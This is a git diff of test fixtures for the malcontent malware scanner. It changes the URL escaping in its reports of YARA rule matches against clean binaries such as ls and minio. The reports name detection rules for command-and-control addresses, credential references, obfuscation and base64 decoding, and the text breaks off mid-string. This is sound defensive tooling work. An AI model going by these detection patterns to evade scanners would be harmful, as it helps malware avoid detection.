[Darwin](https://github.com/search?q=Darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | | MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code)
[openssl](https://github.com/search?q=openssl&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code) | @@ -49,12 +49,12 @@ | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Supports SSH (secure shell) | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [https://jrsoftware.org/isinfo.php?](https%3A%2F%2Fjrsoftware.org%2Fisinfo.php%3F) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Could not find CMAKE_ROOT !!!](https://github.com/search?q=Could+not+find+CMAKE_ROOT+%21%21%21&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [S9_S9_T0_St26random_access_iterator](https://github.com/search?q=S9_S9_T0_St26random_access_iterator&type=code)
[SB_SB_T0_St26random_access_iterator](https://github.com/search?q=SB_SB_T0_St26random_access_iterator&type=code)
[SE_SE_SE_St26random_access_iterator](https://github.com/search?q=SE_SE_SE_St26random_access_iterator&type=code)
[SE_SE_T0_St26random_access_iterator](https://github.com/search?q=SE_SE_T0_St26random_access_iterator&type=code)
[SF_SF_T0_St26random_access_iterator](https://github.com/search?q=SF_SF_T0_St26random_access_iterator&type=code)
[SG_SG_SG_St26random_access_iterator](https://github.com/search?q=SG_SG_SG_St26random_access_iterator&type=code)
[SG_SG_T0_St26random_access_iterator](https://github.com/search?q=SG_SG_T0_St26random_access_iterator&type=code)
[SH_SH_SH_St26random_access_iterator](https://github.com/search?q=SH_SH_SH_St26random_access_iterator&type=code)
[SH_SH_T0_St26random_access_iterator](https://github.com/search?q=SH_SH_T0_St26random_access_iterator&type=code)
[SI_SI_T0_St26random_access_iterator](https://github.com/search?q=SI_SI_T0_St26random_access_iterator&type=code)
[SJ_SJ_T0_St26random_access_iterator](https://github.com/search?q=SJ_SJ_T0_St26random_access_iterator&type=code)
[SK_SK_T0_St26random_access_iterator](https://github.com/search?q=SK_SK_T0_St26random_access_iterator&type=code)
[SL_SL_T0_St26random_access_iterator](https://github.com/search?q=SL_SL_T0_St26random_access_iterator&type=code)
[SO_SO_T0_St26random_access_iterator](https://github.com/search?q=SO_SO_T0_St26random_access_iterator&type=code)
[la_arc4random_buf](https://github.com/search?q=la_arc4random_buf&type=code)
[Curl_none_random](https://github.com/search?q=Curl_none_random&type=code)
[arc4random_mtx](https://github.com/search?q=arc4random_mtx&type=code)
[scheduleRandom](https://github.com/search?q=scheduleRandom&type=code)
[ossl_random](https://github.com/search?q=ossl_random&type=code)
[randomness](https://github.com/search?q=randomness&type=code)
[getrandom](https://github.com/search?q=getrandom&type=code)
[urandom](https://github.com/search?q=urandom&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://www.w3.org/XML/1998/namespace](http://www.w3.org/XML/1998/namespace)
[https://jrsoftware.org/isinfo.php](https://jrsoftware.org/isinfo.php)
[https://curl.se/docs/hsts.html](https://curl.se/docs/hsts.html)
[http://www.w3.org/2000/xmlns/](http://www.w3.org/2000/xmlns/)
[http://nsis.sourceforge.net](http://nsis.sourceforge.net)
[https://curl.se/docs/http](https://curl.se/docs/http) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[arm64](https://github.com/search?q=arm64&type=code)
[x86](https://github.com/search?q=x86&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://www.w3.org/XML/1998/namespace](http%3A%2F%2Fwww.w3.org%2FXML%2F1998%2Fnamespace)
[https://jrsoftware.org/isinfo.php](https%3A%2F%2Fjrsoftware.org%2Fisinfo.php)
[https://curl.se/docs/hsts.html](https%3A%2F%2Fcurl.se%2Fdocs%2Fhsts.html)
[http://www.w3.org/2000/xmlns/](http%3A%2F%2Fwww.w3.org%2F2000%2Fxmlns%2F)
[http://nsis.sourceforge.net](http%3A%2F%2Fnsis.sourceforge.net)
[https://curl.se/docs/http](https%3A%2F%2Fcurl.se%2Fdocs%2Fhttp) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[arm64](https://github.com/search?q=arm64&type=code)
[x86](https://github.com/search?q=x86&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [No password part in the URL](https://github.com/search?q=No+password+part+in+the+URL&type=code)
[cannot set user password](https://github.com/search?q=cannot+set+user+password&type=code)
[check password](https://github.com/search?q=check+password&type=code)
[Bad password](https://github.com/search?q=Bad+password&type=code)
[Password](https://github.com/search?q=Password&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code)
[privatekey](https://github.com/search?q=privatekey&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [aes_encrypt](https://github.com/search?q=aes_encrypt&type=code)
[AES](https://github.com/search?q=AES&type=code) | diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index 45a376d40..128cb789f 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -3,13 +3,13 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |:--|:--|:--|:--| | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | -| LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[linux](https://github.com/search?q=linux&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https%3A%2F%2Fwiki.xiph.org%2FMIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https%3A%2F%2Fwww.gnu.org%2Fsoftware%2Fcoreutils%2F)
[https://translationproject.org/team/](https%3A%2F%2Ftranslationproject.org%2Fteam%2F)
[https://gnu.org/licenses/gpl.html](https%3A%2F%2Fgnu.org%2Flicenses%2Fgpl.html) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[x86](https://github.com/search?q=x86&type=code) | +| LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https%3A%2F%2F)
[linux](https://github.com/search?q=linux&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https%3A%2F%2Fwiki.xiph.org%2FMIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https%3A%2F%2Fwww.gnu.org%2Fsoftware%2Fcoreutils%2F)
[https://translationproject.org/team/](https%3A%2F%2Ftranslationproject.org%2Fteam%2F)
[https://gnu.org/licenses/gpl.html](https%3A%2F%2Fgnu.org%2Flicenses%2Fgpl.html) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variables | [getenv](https://github.com/search?q=getenv&type=code) | diff --git a/tests/linux/clean/minio_x86_64.md b/tests/linux/clean/minio_x86_64.md index 9b069fc50..491266a6b 100644 --- a/tests/linux/clean/minio_x86_64.md +++ b/tests/linux/clean/minio_x86_64.md @@ -4,15 +4,15 @@ |:--|:--|:--|:--| | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [QEMU Virtual CPU](https://github.com/search?q=QEMU+Virtual+CPU&type=code)
[GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | | MEDIUM | [anti-static/obfuscation/js](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/js.yara#high_entropy) | high entropy javascript (>5.37) that uses charAt/substr/join loops | | -| MEDIUM | [anti-static/obfuscation/math](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/math.yara#js_junk_math) | suspicious junk math operations with charAt | [var MAX_SAFE_INTEGER = 9007199254740991;](https://github.com/search?q=var+MAX_SAFE_INTEGER+%3D+9007199254740991%3B&type=code)
[var DEFAULT_TIMEOUT = 1000;](https://github.com/search?q=var+DEFAULT_TIMEOUT+%3D+1000%3B&type=code)
[var LARGE_ARRAY_SIZE = 200;](https://github.com/search?q=var+LARGE_ARRAY_SIZE+%3D+200%3B&type=code)
[var MAX_MEMOIZE_SIZE = 500;](https://github.com/search?q=var+MAX_MEMOIZE_SIZE+%3D+500%3B&type=code)
[var MAX_CACHE_NUM = 2000;](https://github.com/search?q=var+MAX_CACHE_NUM+%3D+2000%3B&type=code)
[var SECTION_SIZE = 100;](https://github.com/search?q=var+SECTION_SIZE+%3D+100%3B&type=code)
[var limit = 1024;](https://github.com/search?q=var+limit+%3D+1024%3B&type=code)
[(seconds % 3600)](https://github.com/search?q=%28seconds+%25+3600%29&type=code)
[(w + 2056)](https://github.com/search?q=%28w+%2B+2056%29&type=code)
[var A=150;](https://github.com/search?q=var+A%3D150%3B&type=code)
[var e=300;](https://github.com/search?q=var+e%3D300%3B&type=code)
[var r=512;](https://github.com/search?q=var+r%3D512%3B&type=code)
[(h + 216)](https://github.com/search?q=%28h+%2B+216%29&type=code)
[(a + 17)](https://github.com/search?q=%28a+%2B+17%29&type=code)
[(e + 16)](https://github.com/search?q=%28e+%2B+16%29&type=code)
[(h + 72)](https://github.com/search?q=%28h+%2B+72%29&type=code)
[(r + 16)](https://github.com/search?q=%28r+%2B+16%29&type=code)
[(s + 72)](https://github.com/search?q=%28s+%2B+72%29&type=code)
[(n+216)](https://github.com/search?q=%28n%2B216%29&type=code)
[(n+72)](https://github.com/search?q=%28n%2B72%29&type=code)
[charAt](https://github.com/search?q=charAt&type=code) | +| MEDIUM | [anti-static/obfuscation/math](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/math.yara#js_junk_math) | suspicious junk math operations with charAt | [var MAX_SAFE_INTEGER = 9007199254740991;](https://github.com/search?q=var+MAX_SAFE_INTEGER+%3D+9007199254740991%3B&type=code)
[var DEFAULT_TIMEOUT = 1000;](https://github.com/search?q=var+DEFAULT_TIMEOUT+%3D+1000%3B&type=code)
[var LARGE_ARRAY_SIZE = 200;](https://github.com/search?q=var+LARGE_ARRAY_SIZE+%3D+200%3B&type=code)
[var MAX_MEMOIZE_SIZE = 500;](https://github.com/search?q=var+MAX_MEMOIZE_SIZE+%3D+500%3B&type=code)
[var MAX_CACHE_NUM = 2000;](https://github.com/search?q=var+MAX_CACHE_NUM+%3D+2000%3B&type=code)
[var SECTION_SIZE = 100;](https://github.com/search?q=var+SECTION_SIZE+%3D+100%3B&type=code)
[var limit = 1024;](https://github.com/search?q=var+limit+%3D+1024%3B&type=code)
[\(seconds % 3600\)](https://github.com/search?q=%28seconds+%25+3600%29&type=code)
[\(w + 2056\)](https://github.com/search?q=%28w+%2B+2056%29&type=code)
[var A=150;](https://github.com/search?q=var+A%3D150%3B&type=code)
[var e=300;](https://github.com/search?q=var+e%3D300%3B&type=code)
[var r=512;](https://github.com/search?q=var+r%3D512%3B&type=code)
[\(h + 216\)](https://github.com/search?q=%28h+%2B+216%29&type=code)
[\(a + 17\)](https://github.com/search?q=%28a+%2B+17%29&type=code)
[\(e + 16\)](https://github.com/search?q=%28e+%2B+16%29&type=code)
[\(h + 72\)](https://github.com/search?q=%28h+%2B+72%29&type=code)
[\(r + 16\)](https://github.com/search?q=%28r+%2B+16%29&type=code)
[\(s + 72\)](https://github.com/search?q=%28s+%2B+72%29&type=code)
[\(n+216\)](https://github.com/search?q=%28n%2B216%29&type=code)
[\(n+72\)](https://github.com/search?q=%28n%2B72%29&type=code)
[charAt](https://github.com/search?q=charAt&type=code) | | MEDIUM | [anti-static/obfuscation/syscall](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/syscall.yara#go_raw_syscall) | invokes raw system calls | [unix.RawSyscall](https://github.com/search?q=unix.RawSyscall&type=code) | -| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s.blob.core.windows.netattempted](https://%s.blob.core.windows.netattempted)
[http://%sStopped](http://%sStopped)
[http://%sServer](http://%sServer)
[https://%serror](https://%serror)
[https://%snil](https://%snil) | +| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s.blob.core.windows.netattempted](https%3A%2F%2F%25s.blob.core.windows.netattempted)
[http://%sStopped](http%3A%2F%2F%25sStopped)
[http://%sServer](http%3A%2F%2F%25sServer)
[https://%serror](https%3A%2F%2F%25serror)
[https://%snil](https%3A%2F%2F%25snil) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [connect_port](https://github.com/search?q=connect_port&type=code)
[commandPort](https://github.com/search?q=commandPort&type=code)
[neighbor_ip](https://github.com/search?q=neighbor_ip&type=code)
[cachedPort](https://github.com/search?q=cachedPort&type=code)
[check_port](https://github.com/search?q=check_port&type=code)
[connect_ip](https://github.com/search?q=connect_ip&type=code)
[domainPort](https://github.com/search?q=domainPort&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[outputPort](https://github.com/search?q=outputPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[workerPort](https://github.com/search?q=workerPort&type=code)
[bind_port](https://github.com/search?q=bind_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[inputPort](https://github.com/search?q=inputPort&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[source_ip](https://github.com/search?q=source_ip&type=code)
[valuePort](https://github.com/search?q=valuePort&type=code)
[fromPort](https://github.com/search?q=fromPort&type=code)
[sas_port](https://github.com/search?q=sas_port&type=code)
[angleIp](https://github.com/search?q=angleIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[ipPort](https://github.com/search?q=ipPort&type=code)
[src_ip](https://github.com/search?q=src_ip&type=code)
[osIp](https://github.com/search?q=osIp&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[cIp](https://github.com/search?q=cIp&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[kIp](https://github.com/search?q=kIp&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [xmlserver_addrldapAttrib_lockEnabledforceCreat](https://github.com/search?q=xmlserver_addrldapAttrib_lockEnabledforceCreat&type=code)
[serverAddr](https://github.com/search?q=serverAddr&type=code)
[serverURL](https://github.com/search?q=serverURL&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientID](https://github.com/search?q=clientID&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#cloudflare_dns_ip) | contains Cloudflare DNS resolver IP | [1.1.1.1](https://github.com/search?q=1.1.1.1&type=code)
[1.1.1.2](https://github.com/search?q=1.1.1.2&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#download_ref) | downloads files | [download file](https://github.com/search?q=download+file&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code)
[zip files](https://github.com/search?q=zip+files&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | | MEDIUM | [collect/databases/postgresql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/postgresql.yara#postgresql) | accesses PostgreSQL databases | [postgresql](https://github.com/search?q=postgresql&type=code) | @@ -21,12 +21,12 @@ | MEDIUM | [credential/gaming/minecraft](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/gaming/minecraft.yara#minecraft) | Has references to Minecraft | [minecraft](https://github.com/search?q=minecraft&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | MEDIUM | [crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid) | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | -| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#js_base64_decode) | decode base64 strings | [js_base64_decode::atob(](https://github.com/search?q=js_base64_decode%3A%3Aatob%28&type=code) | +| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#js_base64_decode) | decode base64 strings | [js_base64_decode::atob\(](https://github.com/search?q=js_base64_decode%3A%3Aatob%28&type=code) | | MEDIUM | [data/base64/external](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/external.yara#base64_shell_encode) | calls base64 command to encode strings | [base64_shell_encode::|base64](https://github.com/search?q=base64_shell_encode%3A%3A%7Cbase64&type=code) | | MEDIUM | [data/embedded/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/base64.yara#base64_content) | Contains embedded base64 content | [base64_content::"T1RUTwALAIAAAwAwQ0ZGIDHtZg4AAAOYAAAAgUZGVE1lkzZwAAAEHAAAABxHREVGABQAFQAABDgAAAAeT1MvMlYNYwkAAAEgAAAAYGNtYXABDQLUAAACNAAAAUJoZWFk/xVFDQAAALwAAAA2aGhlYQdkA+oAAAD0AAAAJGhtdHgD6AAAAAAEWAAAAAZtYXhwAAJQAAAAARgAAAAGbmFtZVjmdH4AAAGAAAAAsXBvc3T/hgAzAAADeAAAACAAAQAAAAEAALZRFsRfDzz1AAsD6AAAAADOBOTLAAAAAM4KHDwAAAAAA+gDIQAAAAgAAgAAAAAAAAABAAADIQAAAFoD6AAAAAAD6AABAAAAAAAAAAAAAAAAAAAAAQAAUAAAAgAAAAQD6AH0AAUAAAKKArwAAACMAooCvAAAAeAAMQECAAACAAYJAAAAAAAAAAAAAQAAAAAAAAAAAAAAAFBmRWQAwAAuAC4DIP84AFoDIQAAAAAAAQAAAAAAAAAAACAAIAABAAAADgCuAAEAAAAAAAAAAQAAAAEAAAAAAAEAAQAAAAEAAAAAAAIAAQAAAAEAAAAAAAMAAQAAAAEAAAAAAAQAAQAAAAEAAAAAAAUAAQAAAAEAAAAAAAYAAQAAAAMAAQQJAAAAAgABAAMAAQQJAAEAAgABAAMAAQQJAAIAAgABAAMAAQQJAAMAAgABAAMAAQQJAAQAAgABAAMAAQQJAAUAAgABAAMAAQQJAAYAAgABWABYAAAAAAAAAwAAAAMAAAAcAAEAAAAAADwAAwABAAAAHAAEACAAAAAEAAQAAQAAAC7//wAAAC7////TAAEAAAAAAAABBgAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAD/gwAyAAAAAQAAAAAAAAAAAAAAAAAAAAABAAQEAAEBAQJYAAEBASH4DwD4GwHEAvgcA/gXBIwMAYuL+nz5tQXkD5j3CBLnEQACAQEBIVhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYAAABAQAADwACAQEEE/t3Dov6fAH6fAT+fPp8+nwHDosMCvm1Cvm1DAz6fBQAAAAAAAABAAAAAMmJbzEAAAAAzgTjFQAAAADOBOQpAAEAAAAAAAAADAAUAAQAAAABAAAAAgABAAAAAAAAAAAD6AAAAAAAAA=="](https://github.com/search?q=base64_content%3A%3A%22T1RUTwALAIAAAwAwQ0ZGIDHtZg4AAAOYAAAAgUZGVE1lkzZwAAAEHAAAABxHREVGABQAFQAABDgAAAAeT1MvMlYNYwkAAAEgAAAAYGNtYXABDQLUAAACNAAAAUJoZWFk%2FxVFDQAAALwAAAA2aGhlYQdkA%2BoAAAD0AAAAJGhtdHgD6AAAAAAEWAAAAAZtYXhwAAJQAAAAARgAAAAGbmFtZVjmdH4AAAGAAAAAsXBvc3T%2FhgAzAAADeAAAACAAAQAAAAEAALZRFsRfDzz1AAsD6AAAAADOBOTLAAAAAM4KHDwAAAAAA%2BgDIQAAAAgAAgAAAAAAAAABAAADIQAAAFoD6AAAAAAD6AABAAAAAAAAAAAAAAAAAAAAAQAAUAAAAgAAAAQD6AH0AAUAAAKKArwAAACMAooCvAAAAeAAMQECAAACAAYJAAAAAAAAAAAAAQAAAAAAAAAAAAAAAFBmRWQAwAAuAC4DIP84AFoDIQAAAAAAAQAAAAAAAAAAACAAIAABAAAADgCuAAEAAAAAAAAAAQAAAAEAAAAAAAEAAQAAAAEAAAAAAAIAAQAAAAEAAAAAAAMAAQAAAAEAAAAAAAQAAQAAAAEAAAAAAAUAAQAAAAEAAAAAAAYAAQAAAAMAAQQJAAAAAgABAAMAAQQJAAEAAgABAAMAAQQJAAIAAgABAAMAAQQJAAMAAgABAAMAAQQJAAQAAgABAAMAAQQJAAUAAgABAAMAAQQJAAYAAgABWABYAAAAAAAAAwAAAAMAAAAcAAEAAAAAADwAAwABAAAAHAAEACAAAAAEAAQAAQAAAC7%2F%2FwAAAC7%2F%2F%2F%2FTAAEAAAAAAAABBgAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAA